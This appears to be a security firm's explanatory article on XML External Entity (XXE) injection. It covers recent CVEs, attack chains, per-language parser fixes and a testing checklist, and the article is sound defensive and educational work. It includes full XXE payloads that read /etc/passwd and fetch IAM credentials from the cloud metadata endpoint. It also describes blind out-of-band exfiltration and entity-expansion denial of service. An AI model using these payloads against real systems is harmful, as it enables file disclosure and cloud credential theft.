XML External Entities: The Bug That Never Went Away

On November 27, 2025, the Apache Software Foundation disclosed CVE-2025-66516 — a CVSS 10.0 XML External Entity (XXE) vulnerability in Apache Tika, the parsing library that sits inside thousands of enterprise document-processing pipelines. The bug: upload a single malicious PDF to any system that uses Tika to extract text, and the server reads your /etc/passwd, your cloud IAM credentials, or — with a slightly longer chain — executes attacker-controlled code as your application's process. No authentication required. No user interaction required. Proof-of-concept exploits published within days.

Adobe absorbed the same CVE into ColdFusion the following week. Every release of ColdFusion 2025 (Update 5 and earlier) and ColdFusion 2023 (Update 17 and earlier) was vulnerable. Akamai had to disclose a separate XXE in their own CloudTest platform (CVE-2025-49493) earlier in 2025 after an AI scanner found it in production. Palo Alto Networks shipped CVE-2024-5919 — a blind XXE in PAN-OS firewalls that let authenticated attackers exfiltrate arbitrary files from the device protecting your network.

This is not the story of a new attack class. XML External Entity injection was first publicly documented in 2002. It has been in the OWASP Top 10 multiple times. The reason it still defines every year's worst-CVE list is structural: XML parsers, in most languages, ship with dangerous defaults — and the developers writing applications don't know which knobs to turn off until after they get hit.

This article is written for two readers. If you are a founder or CTO whose product processes any file format upstream — uploads, documents, images, integrations, webhooks — the first sections explain what is actually at stake. If you are an engineer, the technical sections cover the modern attack chains, the 2024–2026 CVE landscape, and the per-language fixes that actually hold.

The 60-second version for non-technical leaders

XML is a 1998-era data format. It is also the format hiding inside almost every modern document you process — Office files (.docx, .xlsx, .pptx are zipped XML), SVG images, SAML SSO tokens, RSS feeds, PDF metadata (XFA forms), enterprise integration payloads (SOAP, WSDL), even some API request bodies.

The bug class: XML has a feature called "external entities" — placeholders inside the document that point to a file or URL. When a vulnerable XML parser reads a document containing such a placeholder, it dutifully fetches the file or URL and embeds the contents in what the application then treats as user data. An attacker controls the placeholder. The attacker therefore controls what the server reads — files from your disk, URLs from your internal network, cloud metadata that hands over your AWS credentials.

The reason this matters at the executive level:

The attack arrives through normal product use. Your customers upload PDFs, Excel sheets, profile pictures, contract attachments, SAML tokens. Each upload is a chance to hand the server a poisoned XML payload. The user does not know they are sending an exploit. Your application does not know it is processing one.
The blast radius escalates fast. Best case, the attacker reads your application's source code and database connection strings. Worst case (and the chain we see often in real engagements), the XXE escalates to SSRF against your cloud metadata endpoint — which hands the attacker an active IAM role, which hands the attacker your S3 buckets, your RDS database, and your entire AWS account. CVE-2025-66516 explicitly enables this chain.
The 2025 CVE list is dominated by it. Apache Tika (CVSS 10.0), ColdFusion (multiple), Akamai CloudTest, Palo Alto PAN-OS, MetInfo CMS — all in a single year. Each one is a class of customer who suddenly has an emergency patch on their hands. The bug class is not winding down.
The fix is single-line code, but the audit is multi-day work. Disabling external entity resolution in any one parser is one configuration call. The problem: a typical mid-sized application uses three to seven different XML parsers across different modules — SAML library, document processor, image library, RSS feed reader, SOAP client. Fixing one and missing the others leaves you exposed. This is why we keep finding XXE in companies that "patched it last year."
The original Facebook XXE paid $33,500 in 2014. The same researcher had earlier collected $500 from Google for the same bug class. Both companies were running mature security programs. Bug bounty pricing is a useful proxy for real-world severity: XXE was paying premium critical-bug rates a decade ago, and continues to.

Translation: if your product accepts file uploads, processes documents, integrates with SSO, or takes any XML-shaped input — and your last security review did not specifically include the 2024–2026 XXE attack catalog — your filesystem and your cloud credentials are reachable through the same upload form your customers use every day.

Why this bug exists — in one paragraph

XML supports a feature called "external entities" via the Document Type Definition (DTD) — declarations like <!ENTITY xxe SYSTEM "file:///etc/passwd">. When an XML parser encounters &xxe; in the document, it substitutes in the contents of /etc/passwd. The substitution happens transparently, before the application sees the parsed result. Most XML parsers, in most languages, default to resolving external entities. Disabling that behavior requires explicit, parser-specific configuration. Developers who don't know the bug exists do not configure it. The default is wrong, and the language ecosystem has been migrating away from those defaults — slowly, painfully, library by library — for two decades.

Where XML still shows up (and where you have surface)

It is tempting to assume XML is a legacy format. In practice it is alive in some very specific places that almost every modern company touches:

SAML. Enterprise SSO runs on XML. Every SAML implementation has an XML parser. Most of them have been XXE-vulnerable at some point.
Office documents. .docx, .xlsx, .pptx are zipped XML. Any application that processes them parses XML. (Tika sits here.)
PDFs with XFA forms. Adobe's XML Forms Architecture is XML inside the PDF. The Apache Tika CVE-2025-66516 bug is exactly this surface.
SVG images. SVGs are XML. Image processing pipelines that accept SVG (avatars, icons, document conversion, OCR) include an XML parser.
Configuration and data interchange in older enterprise environments — TIBCO, IBM MQ, banking systems, ERP integrations.
RSS, Atom, and feed processing. Less common in greenfield, still alive in news, analytics, marketing tools.
WSDL and SOAP. Still in production at most large enterprises and frequently exposed as integration endpoints.
OpenID 1.x. The original Facebook XXE was here.
Browser-side XML APIs. Some XSS-to-XXE chains exist through XMLHttpRequest and DOMParser in older configurations.

If your application processes any of these, XXE is a question worth asking — and re-asking, each time you add a new parsing library.

Attack 1 — Direct file disclosure

What an attacker does, in plain English: uploads a document containing an XML placeholder pointing at a file on your server. Your application's XML parser reads the file and includes the contents in the parsed object — which is often reflected back to the attacker in an error message, an XML response, or a generated PDF.

Business impact: immediate disclosure of any file the application's user can read. In a typical Linux container, this includes the application's source code, environment variables (which include database credentials, API keys, and JWT secrets), and configuration files. Once an attacker has your environment variables, they have the keys to your kingdom.

Canonical payload:

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

Submitted to any XML endpoint, this returns the contents of /etc/passwd in the parsed response. Variants target /proc/self/environ (process environment variables), ~/.aws/credentials (cloud IAM credentials), or application configuration paths.

Attack 2 — SSRF and cloud metadata theft via XXE

What an attacker does, in plain English: the same payload, but instead of pointing at a file path, points at a URL — including the cloud metadata service at http://169.254.169.254/. XML parsers happily fetch HTTP URLs in many configurations. The parser obliges, the metadata service hands over the application's IAM credentials, and the attacker is now logged into your AWS account as your application.

Business impact: full cloud account compromise from a single uploaded PDF. This is the chain Apache Tika CVE-2025-66516 enabled. It is the same primitive that drives our coverage in the SSRF + Cloud Metadata article — XXE is one of the most reliable ways to get SSRF in modern stacks.

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY ssrf SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root>&ssrf;</root>

Attack 3 — Blind XXE with out-of-band exfiltration

What an attacker does, in plain English: when the application does not reflect the parsed XML back, the attacker tells the parser to fetch an external DTD file from a server the attacker controls. The DTD instructs the parser to read a local file and embed its contents into the URL of a follow-up HTTP or DNS request — to the attacker's server. The attacker reconstructs the file contents from their access logs.

Business impact: exfiltration is possible even from "headless" XML parsers that never return anything to the user. This is the variant that defeats most teams' assumption of "well, our XML endpoint doesn't return XML, so we're safe." It does not need to. The parser's outbound network call is the channel.

The 2024 example: CVE-2024-5919 in Palo Alto Networks PAN-OS. A blind XXE in the management plane let authenticated attackers exfiltrate arbitrary files from the firewall — the device protecting your network — to an attacker-controlled HTTP endpoint. Firewall configurations, admin credentials, VPN keys, the lot.

Attack 4 — DoS via billion-laughs and quadratic blowup

What an attacker does, in plain English: sends a tiny XML document (a few kilobytes) that expands into gigabytes of memory through nested entity references. The parser allocates, the process runs out of memory, the service falls over.

Business impact: low-effort denial of service for any service that accepts XML input. A single 3KB request can take down a production process. Most parsers have default limits on entity expansion; some don't, and the application may use an "unlimited" variant for "convenience" — which is exactly the pattern attackers fingerprint for.

The 2024–2026 CVE landscape

CVE-2025-66516 — Apache Tika. CVSS 10.0. Disclosed November 27, 2025. XXE via XFA content in PDFs processed by tika-core 1.13–3.2.1 and tika-pdf-module 2.0.0–3.2.1. No authentication required. Public PoC exploits available. Used by document-processing pipelines across the enterprise.
Adobe ColdFusion follow-on. ColdFusion 2025 (Update 5 and earlier) and ColdFusion 2023 (Update 17 and earlier) absorbed the same Tika dependency. Adobe shipped fixes in ColdFusion 2025 Update 6 and 2023 Update 18. Every ColdFusion customer who patched late was exposed.
CVE-2025-49493 — Akamai CloudTest. XXE in the SOAP endpoint at /concerto/services/RepositoryService. Identified autonomously by XBOW's vulnerability scanner. Affected multiple SOAP endpoints across CloudTest instances. Akamai's own platform — which a number of bug-bounty-running companies operate atop — was vulnerable.
CVE-2024-5919 — Palo Alto Networks PAN-OS. Blind XXE in PAN-OS management plane. Authenticated attackers could exfiltrate arbitrary files from the firewall to attacker-controlled HTTP endpoints.
MetInfo CMS <= 8.1. SSRF via XXE. Allowed attackers to construct malicious XML entities forcing the server to initiate HTTP requests to arbitrary internal or external addresses.

The pattern across this list: document processing (Tika, ColdFusion), SOAP integrations (Akamai), management interfaces (PAN-OS), and web applications (MetInfo). XXE is not concentrated in one niche — it is wherever XML is being parsed without secure defaults.

The fixes — per language

The fix is one line per parser. The audit work is finding all of them.

Python: Use defusedxml instead of the standard library's XML parsers. defusedxml.ElementTree drops in as a replacement for xml.etree.ElementTree and ships secure defaults.
Java: Disable DTDs and external entities on the parser factory. The exact incantation differs by parser:
- DocumentBuilderFactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
- SAXParserFactory.setFeature("http://xml.org/sax/features/external-general-entities", false);
- XMLInputFactory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
Audit every parser instantiation in the codebase; do not assume "we did it once."
.NET: Set XmlResolver = null on XmlReaderSettings. Prefer XDocument over XmlDocument. On modern .NET (5+), defaults are safer but legacy code paths still bite — the ColdFusion 2025 absorption is a real example.
PHP: Use libxml_set_external_entity_loader(null) in modern PHP (8.0+). On older PHP, libxml_disable_entity_loader(true) before parsing.
Node.js: Most XML parsers (xml2js, fast-xml-parser, sax) don't resolve external entities by default. Verify the version and options on every parser you depend on.
Go: The standard encoding/xml doesn't resolve external entities. Watch for third-party parsers that wrap libxml2 — those inherit libxml2's defaults.
Ruby: Nokogiri 1.12.0+ disabled external entity loading by default. Older versions need noent: false, nonet: true explicitly.

The boardroom translation table

What your team says	What it means	What it could cost you
"We process Office docs / PDFs / SVG uploads"	You have an XML parser in the upload pipeline. If any parser is unconfigured, you are vulnerable.	File disclosure → environment variable theft → cloud credential theft → full AWS compromise.
"We're on Apache Tika"	CVE-2025-66516 (CVSS 10.0). Patch your tika-core and tika-pdf-module immediately.	Unauthenticated RCE via a single uploaded PDF.
"We run ColdFusion"	Update 6 (2025) or Update 18 (2023). Earlier versions absorb the Tika XXE.	Same as above. Adobe's own framework is in the exposure chain.
"Our XML endpoint doesn't return XML, so we're safe"	Blind XXE with out-of-band exfiltration does not need a response. Palo Alto's CVE-2024-5919 is the proof point.	File exfiltration via DNS or HTTP that your team's monitoring almost certainly does not see.
"We disabled it last year"	You disabled it in one parser. Most apps have three to seven different parsers.	Almost certain finding in any external assessment focused on parsing.

Five questions a non-technical leader should ask the engineering team

"List every XML parser our code uses, including transitively." If your team can produce the list in under an hour, you have parser hygiene. If not, that is the answer — an unmapped parsing surface is an XXE finding waiting to happen.
"Are we on the patched versions of Apache Tika, ColdFusion, and any document-processing library?" The 2025 wave required emergency patching across these. If your team cannot name the patch level, prioritize the audit.
"Do we accept SVG uploads, Office file uploads, or any file format that contains XML internally?" If yes, and the parsing is on the server side, this is a primary attack surface — and most teams do not realize it.
"What happens if our application server makes an outbound HTTP request to 169.254.169.254?" If the answer is "nothing — we don't monitor that," your blind-XXE-to-AWS-credentials chain is invisible to your detection stack.
"When was the last time we tested the upload pipeline for XXE specifically — not just generic security scanning?" Generic scanners often miss it because the exploit lives in document internals. Manual or specialized testing is required.

What we test, every engagement involving file uploads or XML parsing

Direct file disclosure via file:// entities against /etc/passwd, /proc/self/environ, ~/.aws/credentials, and application config paths.
SSRF via http:// entities against the cloud metadata endpoint and internal network ranges.
Blind XXE with out-of-band exfiltration via a controlled DTD and a Burp Collaborator (or equivalent) listener.
XXE inside Office documents (.docx, .xlsx) by modifying the internal XML and re-zipping.
XXE inside SVG uploads via the standard SVG XML wrapper.
XXE inside PDF XFA forms (the CVE-2025-66516 vector).
XXE inside SAML responses on the SSO endpoint (often a separate parser from the main application).
Billion-laughs and quadratic-blowup DoS against XML endpoints.
Parameter entity attacks (<!ENTITY % …>) for parsers that resolve general entities but not parameter entities by default.
XInclude attacks against parsers that support <xi:include>.

If your last assessment did not specifically test against the 2024–2026 catalog — Tika XFA payloads, blind XXE out-of-band exfiltration, SVG/Office variants — your upload pipeline has not been pressure-tested against the current attacker.

Why XXE is a useful canary

When we find XXE in an application, it tells us something specific: this team has not done a security review focused on parsing. Almost always, finding XXE in one place is followed by finding it in two or three more, often through different XML parsers in different modules. The bug class is a marker for systemic parser-handling debt.

For us, that is why XXE is one of the most diagnostic findings in an engagement. A single XXE bug rarely lives alone, and the audit work that surfaces the second and third instances usually surfaces other parsing bugs as well (insecure deserialization, prototype pollution, SSRF via other channels).

The bottom line

XML External Entity injection is a 23-year-old bug class. It is the bug that Apache Tika absorbed at CVSS 10.0 in November 2025. It is the bug that Adobe shipped into ColdFusion the following week. It is the bug Akamai found in their own platform. It is the bug Palo Alto patched in the firewall protecting your network. And it is the bug we still find on engagements that include any meaningful upload pipeline or XML processing path.

The defenses are short, well-documented, and per-language — but they require an audit of every XML parser your application touches, including transitively through libraries. If your team has not done that audit in the last twelve months, this is the cheapest, highest-leverage security project on your roadmap. The cost of doing it this quarter is meaningfully smaller than the cost of being the next CVSS-10.0 case study.